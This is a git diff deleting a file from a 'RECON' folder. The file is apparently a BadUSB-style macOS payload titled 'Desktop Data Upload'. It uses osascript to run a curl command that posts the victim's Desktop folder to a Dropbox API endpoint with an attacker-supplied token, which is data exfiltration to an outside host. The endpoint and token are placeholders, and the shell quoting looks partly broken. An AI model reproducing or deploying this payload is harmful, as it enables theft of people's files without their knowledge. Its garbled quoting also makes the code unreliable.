diff --git a/RECON/Desktop Data Upload .txt b/RECON/Desktop Data Upload .txt deleted file mode 100644 index abb564e..0000000 --- a/RECON/Desktop Data Upload .txt +++ /dev/null @@ -1,18 +0,0 @@ -REM Author: Narsty -REM Title: Desktop Data Upload -REM Version 1.0 MacOs - - - -osascript -e 'tell application "Script Editor" - set desktopPath to POSIX path of (path to desktop folder) - set dropboxAPIPath to "Your API token Here" - set uploadScript to "curl -X POST 'URL of the Dropbox API endpoint' \ - -H 'Authorization: Bearer " & dropboxAPIPath & "' \ - -H 'Dropbox-API-Arg: {\"path\": \"/Desktop/$(basename \\\"" & desktopPath & "\\\"), \\\"mode\\\": \\\"overwrite\\\"}' \ - -H 'Content-Type: application/octet-stream' \ - --data-binary @\"" & desktopPath & "\"" - do shell script uploadScript -end tell' - -